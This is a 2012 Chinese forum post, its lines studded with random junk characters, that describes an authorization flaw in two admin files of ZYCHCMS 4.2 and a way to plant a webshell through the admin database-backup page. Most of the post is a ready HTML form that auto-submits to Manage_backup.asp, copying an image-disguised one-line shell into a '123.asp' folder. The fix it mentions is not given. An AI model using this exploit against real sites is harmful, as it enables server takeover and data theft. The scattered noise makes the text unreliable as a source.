% C# d. m/ s! [
5 x& F9 l, a. I, F+ u
- c! }% u7 R9 {5 z, w$ g6 }, A# F# c8 o+ J1 o
影响版本:ZYCHCMS企业网站管理系统4.2(存在以下两个文件的版本应该是通杀)/ y- i/ T% t$ k7 y
①SQL注射漏洞1 q; N+ j7 V( U% F2 F, o4 A' {
漏洞文件:/admin/add_js.asp & /admin/add_xm_jiang.asp5 A0 G; x/ _# _" w; O
漏洞原因:未过滤
8 h1 U$ G5 b; u1 K: ^) e 漏洞代码:' ~( y* b: r+ ]. J1 H4 n6 p
都是相同的,文件开头没有调用过滤文件/admin/seeion.asp,导致没有对当前权限进行判断,就直接操作数据库。
% l3 {% l5 e% }/ O' @6 u4 c 修复方法:在文件开头加入代码
: y- y' Q1 A% B M: @& t+ Y1 E9 |& m+ `: K k
; ^5 B4 {) k( N
②后台拿WBSHELL( ?$ H& ~! ^6 r8 ^9 {8 o e
进入后台有一个数据库备份,可以通过本地提交突破创建.asp后缀文件夹,并将一句话备份进去。
5 d. L5 U2 L( u# i; {; a7 f: B 这里在网上找了一个,改了下,将就着用。
. W( e6 p; p% I; y$ Q 以下是代码本地提交代码" i0 B3 p& d% A" [/ Z
! v; k1 g9 j9 u% C- ?0 m7 K0 W1 A) @' d& J
<form method=”post” action=”http://localhost/admin/Manage_backup.asp?action=Backup” name=add>/ u/ q) i* I) N' {1 X' S8 w
<!–eg:http://127.0.0.1:99/admin/Manage_backup.asp?action=Backup–>$ ]$ o8 ^. ^) {% F# N" Q, f: \
<tr>- M$ K9 G; v9 Z/ E
<td height=”30″ background=”images/bg_list.gif”><div style=”padding-left:10px; font-weight:bold; color:#FFFFFF; text-align:left”>备份数据库</div></td>& a Q9 v3 a& f+ }9 J
</tr>
% _3 y7 `! s7 w <tr>3 r2 _6 V0 Q9 w
<td bgcolor=”#FFFFFF”><span class=”back_southidc”>$ J: g1 {" r/ d3 q/ p
</span>
" P& f8 {" B7 u. B* _9 G$ ^ <table width=”100%” border=”0″ align=”center” cellpadding=”5″ cellspacing=”0″ >
6 C9 p4 \7 ]! n+ B <tr onmouseover=”style.backgroundColor=’#EEEEEE’” onmouseout=”style.backgroundColor=’#F1F5F8′” bgcolor=”#F1F5F8″ >/ A3 {; t$ |, v m5 _. j
<td height=”25″ width=”30%” class=”td”><div align=”left”>当前数据库路径</div></td>+ e0 a* s. I `, Z
<td width=”70%” class=”td”>90sec. K5 L9 v8 S8 d
0 ~ ]1 b$ q; l- f+ v" [ <div align=”left”>5 I! f6 Y! Q7 K
<input type=”text” size=”30″ name=”DBpath” value=”此处为你在其网站上传的图片格式一句话路径” />
9 w3 K/ J1 f" W7 l: s& @ <!–eg:../uploadfile/image/Logo/20120803130885328532_ZYCH.jpg>9 t% w% \" j" p" \
<input type=”hidden” size=”50″ name=”bkfolder” value=”123.asp” />
. L# S* x! X2 d: i' N </div></td>2 |9 p* H5 G8 H. u
</tr>
7 L9 O; d+ v% d( \; i6 u; M5 D <tr onmouseover=”style.backgroundColor=’#EEEEEE’” onmouseout=”style.backgroundColor=’#FFFFFF’” bgcolor=”#FFFFFF”>( v, D7 r8 V+ d
<td height=”25″ width=”30%” class=”td”><div align=”left”>备份数据库名称</div></td>
* f6 b7 D8 K% c; B/ x g <td class=”td”><div align=”left”>
/ l2 v9 L" P; t0 w' D+ h <input type=”text” size=”30″ name=”bkDBname” value=”4.mdb” />
- v+ `+ F2 T: v5 f1 R; ` [如备份目录有该文件,将覆盖,如沒有,将自动创建]</div></td>
: V9 X4 {3 Z5 W9 q1 v9 `8 U V </tr>
! I8 i3 R; E/ d9 W! q3 o) ~ <tr onmouseover=”style.backgroundColor=’#EEEEEE’” onmouseout=”style.backgroundColor=’#F1F5F8′” bgcolor=”#F1F5F8″># H6 A& b( d+ y
<td height=”25″ width=”30%” class=”td”><div align=”left”></div></td>
# i6 O/ I7 d( H0 Q# D# w; Y! p <td class=”td”><div align=”left”>
. f% }, U0 L# L- M <input type=”submit” value=”确定备份” class=”btn”
7 C- `- p' S2 F0 S </div></td>
~) n M# ^* o: O( g! u8 ~& A </tr>
% R; I" R7 ]8 _+ @. W/ {# B </table></td></tr></form>
1 F3 R; D6 u! }6 I' N o( h </table>
2 G. f& K' I Q5 B( L# R9 n </td>2 S+ [+ m @1 m/ k I% |# c+ o* \
</tr>
% R( |8 U6 H& I5 H- O </table>7 y: j+ K) W Y8 s0 O P0 E4 G9 P
<script>
) A5 Y, X/ @0 I0 l) X document.all.add.submit();& A. P+ L$ t+ q. J
</script>
+ L$ Q5 E, l9 U: v* j4 Y; L % t/ W: f! |; @
9 w& Y4 Q% `3 H! J$ ]7 U
, ]. |4 ~& m/ L
+ r) ]% O/ E* _
) |6 }; H ?, i: R+ J! [
2 Q- s* L6 v, R+ _/ I
3 m" [" f- L/ v! ~/ q' o
3 u7 M. k4 C& ]" N$ I0 F3 _/ {$ a) t0 C* ]2 _* I
8 r) ~! f0 p, Z+ r4 x1 l5 \# C# p
|
发表于 2012-9-10 21:09:51
收藏
支持
反对